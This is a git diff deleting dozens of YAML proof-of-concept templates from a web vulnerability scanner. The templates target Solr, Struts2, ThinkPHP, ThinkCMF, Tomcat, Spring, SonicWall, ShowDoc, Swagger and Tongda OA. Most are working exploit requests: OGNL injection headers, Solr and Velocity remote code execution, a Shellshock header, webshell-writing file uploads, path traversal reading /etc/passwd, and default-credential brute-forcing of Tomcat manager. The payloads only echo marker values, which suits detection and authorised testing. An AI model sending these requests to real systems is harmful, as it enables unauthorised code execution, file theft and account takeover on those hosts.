diff --git a/WebScan/pocs/showdoc-uploadfile.yml b/WebScan/pocs/showdoc-uploadfile.yml deleted file mode 100644 index 0921919..0000000 --- a/WebScan/pocs/showdoc-uploadfile.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-showdoc-uploadfile -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: /index.php?s=/home/page/uploadImg - headers: - Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633" - follow_redirects: false - body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n\n----------------------------835846770881083140190633--" - expression: | - response.status == 200 && response.body.bcontains(b"success") - search: | - (?P\d{4}-\d{2}-\d{2})\\/(?P[a-f0-9]+\.php) - - method: GET - path: /Public/Uploads/{{date}}/{{file}} - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(r2)) -detail: - author: White(https://github.com/WhiteHSBG) - Affected Version: "showdoc <= 2.8.6" - links: - - https://github.com/star7th/showdoc/pull/1059 \ No newline at end of file diff --git a/WebScan/pocs/solr-cve-2019-0193.yml b/WebScan/pocs/solr-cve-2019-0193.yml deleted file mode 100644 index 28e4b75..0000000 --- a/WebScan/pocs/solr-cve-2019-0193.yml +++ /dev/null 
@@ -1,30 +0,0 @@ -name: poc-yaml-solr-cve-2019-0193 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: GET - path: /solr/admin/cores?wt=json - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: '"name":"(?P.*?)"' - - method: POST - path: >- - /solr/{{core}}/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,{{r1}}*{{r2}})%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3E - headers: - Content-Type: text/html - body: |- - - - - - - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: fnmsd(https://github.com/fnmsd) - solr_version: '<8.1.12' - vulnpath: '/solr/{{core}}/dataimport' - description: 'Apache Solr DataImportHandler Remote Code Execution Vulnerability(CVE-2019-0193)' - links: - - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 
diff --git a/WebScan/pocs/solr-fileread1.yml b/WebScan/pocs/solr-fileread1.yml deleted file mode 100644 index 0b92afd..0000000 --- a/WebScan/pocs/solr-fileread1.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-solr-fileread1 -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: >- - "name":"(?P.+?)" - - method: POST - path: "/solr/{{core}}/config" - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.body.bcontains(b"responseHeader") - - method: POST - path: "/solr/{{core}}/debug/dump?param=ContentStreams" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - stream.url=file:///etc/passwd - expression: | - response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body) -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/solr-fileread2.yml b/WebScan/pocs/solr-fileread2.yml deleted file mode 100644 index 60def9e..0000000 --- a/WebScan/pocs/solr-fileread2.yml +++ /dev/null 
@@ -1,25 +0,0 @@ -name: poc-yaml-solr-fileread2 -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - expression: "true" - search: >- - "name":"(?P.+?)" - - method: POST - path: "/solr/{{core}}/config" - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.body.bcontains(b"responseHeader") - - method: POST - path: "/solr/{{core}}/debug/dump?param=ContentStreams" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - stream.url=file:///c://windows/win.ini - expression: | - response.status == 200 && response.body.bcontains(b"for 16-bit app support") -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/solr-velocity-template-rce.yml b/WebScan/pocs/solr-velocity-template-rce.yml deleted file mode 100644 index 4529340..0000000 --- a/WebScan/pocs/solr-velocity-template-rce.yml +++ /dev/null 
@@ -1,38 +0,0 @@ -name: poc-yaml-solr-velocity-template-rce -set: - r1: randomInt(20000, 40000) - r2: randomInt(20000, 40000) -rules: - - method: GET - path: "/solr/admin/cores?wt=json" - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: | - "name":"(?P[^"]+)" - - method: POST - path: >- - /solr/{{core}}/config - headers: - Content-Type: application/json - body: |- - { - "update-queryresponsewriter": { - "startup": "test", - "name": "velocity", - "class": "solr.VelocityResponseWriter", - "template.base.dir": "", - "solr.resource.loader.enabled": "true", - "params.resource.loader.enabled": "true" - } - } - expression: response.status == 200 - - method: GET - path: "/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{{r1}}%20*%20{{r2}})%24c" - follow_redirects: false - expression: response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: Loneyer - description: 'Apache Solr RCE via Velocity template' - links: - - https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt - - https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2 diff --git a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml b/WebScan/pocs/sonicwall-ssl-vpn-rce.yml deleted file mode 100644 index 4b00104..0000000 --- a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-sonicwall-ssl-vpn-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(1140000, 1144800) -rules: - - method: GET - path: /cgi-bin/jarrewrite.sh - follow_redirects: false - headers: - X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) -detail: - author: sharecast - links: - - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ 
diff --git a/WebScan/pocs/spring-actuator-heapdump-file.yml b/WebScan/pocs/spring-actuator-heapdump-file.yml deleted file mode 100644 index db481ae..0000000 --- a/WebScan/pocs/spring-actuator-heapdump-file.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-spring-actuator-heapdump-file -rules: - - method: HEAD - path: /actuator/heapdump - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("application/octet-stream") -detail: - author: AgeloVito - info: spring-actuator-heapdump-file - links: - - https://www.cnblogs.com/wyb628/p/8567610.html diff --git a/WebScan/pocs/spring-cloud-cve-2020-5405.yml b/WebScan/pocs/spring-cloud-cve-2020-5405.yml deleted file mode 100644 index f11a403..0000000 --- a/WebScan/pocs/spring-cloud-cve-2020-5405.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-spring-cloud-cve-2020-5405 -rules: - - method: GET - path: >- - /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit.")) - -detail: - version: <= 2.1.6, 2.2.1 - author: kingkk(https://www.kingkk.com/) - links: - - https://pivotal.io/security/cve-2020-5405 - - https://github.com/spring-cloud/spring-cloud-config \ No newline at end of file diff --git a/WebScan/pocs/spring-cloud-cve-2020-5410.yml b/WebScan/pocs/spring-cloud-cve-2020-5410.yml deleted file mode 100644 index 026b337..0000000 --- a/WebScan/pocs/spring-cloud-cve-2020-5410.yml +++ /dev/null 
@@ -1,12 +0,0 @@ -name: poc-yaml-spring-cloud-cve-2020-5410 -rules: - - method: GET - path: >- - /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: Soveless(https://github.com/Soveless) - Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9" - links: - - https://xz.aliyun.com/t/7877 \ No newline at end of file diff --git a/WebScan/pocs/spring-cve-2016-4977.yml b/WebScan/pocs/spring-cve-2016-4977.yml deleted file mode 100644 index 5df7d07..0000000 --- a/WebScan/pocs/spring-cve-2016-4977.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-spring-cve-2016-4977 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: GET - path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test - follow_redirects: false - expression: > - response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)" - author: hanxiansheng26(https://github.com/hanxiansheng26) - links: - - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977 diff --git a/WebScan/pocs/spring-heapdump-file.yml b/WebScan/pocs/spring-heapdump-file.yml deleted file mode 100644 index 148930d..0000000 --- a/WebScan/pocs/spring-heapdump-file.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-spring-heapdump-file -rules: - - method: HEAD - path: /heapdump - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("application/octet-stream") -detail: - author: AgeloVito - info: spring-heapdump-file - links: - - https://www.cnblogs.com/wyb628/p/8567610.html diff --git a/WebScan/pocs/springboot-env-unauth.yml b/WebScan/pocs/springboot-env-unauth.yml deleted file mode 100644 index 5ddda4f..0000000 --- a/WebScan/pocs/springboot-env-unauth.yml +++ /dev/null 
@@ -1,9 +0,0 @@ -name: poc-yaml-springboot-env-unauth -rules: - - method: GET - path: /env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") -detail: - links: - - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/springboot-env-unauth2.yml b/WebScan/pocs/springboot-env-unauth2.yml deleted file mode 100644 index 6a78661..0000000 --- a/WebScan/pocs/springboot-env-unauth2.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-springboot-env-unauth -rules: - - method: GET - path: /actuator/env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") -detail: - links: - - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/springcloud-cve-2019-3799.yml b/WebScan/pocs/springcloud-cve-2019-3799.yml deleted file mode 100644 index 821028f..0000000 --- a/WebScan/pocs/springcloud-cve-2019-3799.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-springcloud-cve-2019-3799 -rules: - - method: GET - path: >- - /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd - follow_redirects: true - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) - -detail: - version: <2.1.2, 2.0.4, 1.4.6 - author: Loneyer - links: - - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 diff --git a/WebScan/pocs/struts2-045-1.yml b/WebScan/pocs/struts2-045-1.yml deleted file mode 100644 index d2dc423..0000000 --- a/WebScan/pocs/struts2-045-1.yml +++ /dev/null 
@@ -1,15 +0,0 @@ -name: poc-yaml-struts2_045-1 -set: - r1: randomInt(800, 1000) - r2: randomInt(800, 1000) -rules: - - method: GET - path: / - headers: - Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data - follow_redirects: true - expression: | - "Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2)) -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/struts2-045-2.yml b/WebScan/pocs/struts2-045-2.yml deleted file mode 100644 index 18769e6..0000000 --- a/WebScan/pocs/struts2-045-2.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-struts2_045-2 -rules: - - method: GET - path: / - headers: - Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}" - follow_redirects: true - expression: | - response.body.bcontains(b"struts2_security_check") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/struts2-046-1.yml b/WebScan/pocs/struts2-046-1.yml deleted file mode 100644 index f0ec629..0000000 --- a/WebScan/pocs/struts2-046-1.yml +++ /dev/null 
@@ -1,16 +0,0 @@ -name: poc-yaml-struts2_046-1 -set: - r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------" -rules: - - method: POST - path: / - headers: - Content-Type: multipart/form-data; boundary=--------------------------- - follow_redirects: true - body: | - {{r1}} - expression: | - response.body.bcontains(b"struts2_security_check") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/swagger-ui-unauth-No1.yml b/WebScan/pocs/swagger-ui-unauth-No1.yml deleted file mode 100644 index 5971c53..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No1.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth1 -rules: - - method: GET - path: /swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No2.yml b/WebScan/pocs/swagger-ui-unauth-No2.yml deleted file mode 100644 index a3f663e..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No2.yml +++ /dev/null 
@@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth2 -rules: - - method: GET - path: /api/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No3.yml b/WebScan/pocs/swagger-ui-unauth-No3.yml deleted file mode 100644 index 66e81f1..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No3.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth3 -rules: - - method: GET - path: /service/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No4.yml b/WebScan/pocs/swagger-ui-unauth-No4.yml deleted file mode 100644 index e109fc9..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No4.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth4 -rules: - - method: GET - path: /web/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No5.yml b/WebScan/pocs/swagger-ui-unauth-No5.yml deleted file mode 100644 index f111855..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No5.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth5 -rules: - - method: GET - path: /swagger/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 
diff --git a/WebScan/pocs/swagger-ui-unauth-No6.yml b/WebScan/pocs/swagger-ui-unauth-No6.yml deleted file mode 100644 index 3f18e6e..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No6.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth6 -rules: - - method: GET - path: /actuator/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No7.yml b/WebScan/pocs/swagger-ui-unauth-No7.yml deleted file mode 100644 index 2e130c9..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No7.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth7 -rules: - - method: GET - path: /libs/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No8.yml b/WebScan/pocs/swagger-ui-unauth-No8.yml deleted file mode 100644 index 33a63f4..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No8.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui8 -rules: - - method: GET - path: /template/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/thinkadmin-v6-readfile.yml b/WebScan/pocs/thinkadmin-v6-readfile.yml deleted file mode 100644 index 37755bf..0000000 --- a/WebScan/pocs/thinkadmin-v6-readfile.yml +++ /dev/null 
@@ -1,13 +0,0 @@ -name: poc-yaml-thinkadmin-v6-readfile -rules: - - method: GET - path: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes("PD9waH")) && response.body.bcontains(bytes("VGhpbmtBZG1pbg")) -detail: - author: 0x_zmz(github.com/0x-zmz) - info: thinkadmin-v6-readfile By 0x_zmz - links: - - https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw - - https://github.com/0x-zmz diff --git a/WebScan/pocs/thinkcmf-lfi.yml b/WebScan/pocs/thinkcmf-lfi.yml deleted file mode 100644 index 3b56650..0000000 --- a/WebScan/pocs/thinkcmf-lfi.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-thinkcmf-lfi - -rules: - - method: GET - path: "/?a=display&templateFile=README.md" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) - -detail: - author: JerryKing - ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 - links: - - https://www.freebuf.com/vuls/217586.html diff --git a/WebScan/pocs/thinkcmf-write-shell.yml b/WebScan/pocs/thinkcmf-write-shell.yml deleted file mode 100644 index 5527f44..0000000 --- a/WebScan/pocs/thinkcmf-write-shell.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: poc-yaml-thinkcmf-write-shell -set: - r: randomInt(10000, 20000) - r1: randomInt(1000000000, 2000000000) -rules: - - method: GET - path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}}%3B%22)%3B" - expression: "true" - - method: GET - path: "/{{r}}.php" - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1))) - -detail: - author: violin - ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 - links: - - https://www.freebuf.com/vuls/217586.html diff --git a/WebScan/pocs/thinkphp-v6-file-write.yml b/WebScan/pocs/thinkphp-v6-file-write.yml deleted file mode 100644 index 8346f40..0000000 
--- a/WebScan/pocs/thinkphp-v6-file-write.yml +++ /dev/null @@ -1,26 +0,0 @@ -name: poc-yaml-thinkphp-v6-file-write -set: - f1: randomInt(800000000, 900000000) -rules: - - method: GET - path: /{{f1}}.php - follow_redirects: true - expression: | - response.status == 404 - - method: GET - path: / - headers: - Cookie: PHPSESSID=../../../../public/{{f1}}.php - follow_redirects: true - expression: | - response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains(string(f1)) - - method: GET - path: /{{f1}}.php - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("text/html") -detail: - author: Loneyer - Affected Version: "Thinkphp 6.0.0" - links: - - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write diff --git a/WebScan/pocs/thinkphp5-controller-rce.yml b/WebScan/pocs/thinkphp5-controller-rce.yml deleted file mode 100644 index c0ddd62..0000000 --- a/WebScan/pocs/thinkphp5-controller-rce.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-thinkphp5-controller-rce -rules: - - method: GET - path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 - expression: | - response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") - -detail: - links: - - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce \ No newline at end of file diff --git a/WebScan/pocs/thinkphp5023-method-rce.yml b/WebScan/pocs/thinkphp5023-method-rce.yml deleted file mode 100644 index d24987b..0000000 --- a/WebScan/pocs/thinkphp5023-method-rce.yml +++ /dev/null 
@@ -1,13 +0,0 @@ -name: poc-yaml-thinkphp5023-method-rce -rules: - - method: POST - path: /index.php?s=captcha - headers: - Content-Type: application/x-www-form-urlencoded - body: | - _method=__construct&filter[]=printf&method=GET&server[REQUEST_METHOD]=TmlnaHQgZ2F0aGVycywgYW5%25%25kIG5vdyBteSB3YXRjaCBiZWdpbnMu&get[]=1 - expression: | - response.body.bcontains(b"TmlnaHQgZ2F0aGVycywgYW5%kIG5vdyBteSB3YXRjaCBiZWdpbnMu1") -detail: - links: - - https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce \ No newline at end of file diff --git a/WebScan/pocs/tianqing-info-leak.yml b/WebScan/pocs/tianqing-info-leak.yml deleted file mode 100644 index 6bf6789..0000000 --- a/WebScan/pocs/tianqing-info-leak.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-tianqing-info-leak -rules: - - method: GET - path: /api/dbstat/gettablessize - expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name") -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/tomcat-cve-2017-12615-rce.yml b/WebScan/pocs/tomcat-cve-2017-12615-rce.yml deleted file mode 100644 index dc1fdf7..0000000 --- a/WebScan/pocs/tomcat-cve-2017-12615-rce.yml +++ /dev/null 
@@ -1,22 +0,0 @@ -name: poc-yaml-tomcat-cve-2017-12615-rce -set: - filename: randomLowercase(6) - verifyStr: randomLowercase(12) - commentStr: randomLowercase(12) -rules: - - method: PUT - path: '/{(unknown)}.jsp/' - body: '{{verifyStr}} <%-- {{commentStr}} --%>' - follow_redirects: false - expression: | - response.status == 201 - - method: GET - path: '/{(unknown)}.jsp' - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://www.seebug.org/vuldb/ssvid-96562 - - https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA diff --git a/WebScan/pocs/tomcat-cve-2018-11759.yml b/WebScan/pocs/tomcat-cve-2018-11759.yml deleted file mode 100644 index 7ab73aa..0000000 --- a/WebScan/pocs/tomcat-cve-2018-11759.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-tomcat-cve-2018-11759 -rules: - - method: GET - path: /jkstatus; - follow_redirects: false - expression: | - response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body) - - method: GET - path: /jkstatus;?cmd=dump - follow_redirects: false - expression: | - response.status == 200 && "ServerRoot=*".bmatches(response.body) -detail: - author: loneyer - links: - - https://github.com/immunIT/CVE-2018-11759 diff --git a/WebScan/pocs/tomcat-manager-weak.yml b/WebScan/pocs/tomcat-manager-weak.yml deleted file mode 100644 index b167851..0000000 --- a/WebScan/pocs/tomcat-manager-weak.yml +++ /dev/null 
@@ -1,31 +0,0 @@ -name: poc-yaml-tomcat-manager-weak -sets: - username: - - tomcat - - admin - - root - - manager - password: - - "" - - admin - - tomcat - - 123456 - - root - payload: - - base64(username+":"+password) -rules: - - method: GET - path: /manager/html - follow_redirects: false - expression: | - response.status == 401 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") - - method: GET - path: /manager/html - headers: - Authorization: Basic {{payload}} - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/tongda-meeting-unauthorized-access.yml b/WebScan/pocs/tongda-meeting-unauthorized-access.yml deleted file mode 100644 index b7e4e5c..0000000 --- a/WebScan/pocs/tongda-meeting-unauthorized-access.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-tongda-meeting-unauthorized-access -rules: - - method: GET - path: >- - /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay - headers: - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36' - Accept-Encoding: 'deflate' - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle"))) -detail: - author: 清风明月(www.secbook.info) - influence_version: ' < 通达OA 11.5' - links: - - https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA diff --git a/WebScan/pocs/tongda-user-session-disclosure.yml b/WebScan/pocs/tongda-user-session-disclosure.yml deleted file mode 100644 index 05768d9..0000000 --- a/WebScan/pocs/tongda-user-session-disclosure.yml +++ /dev/null 
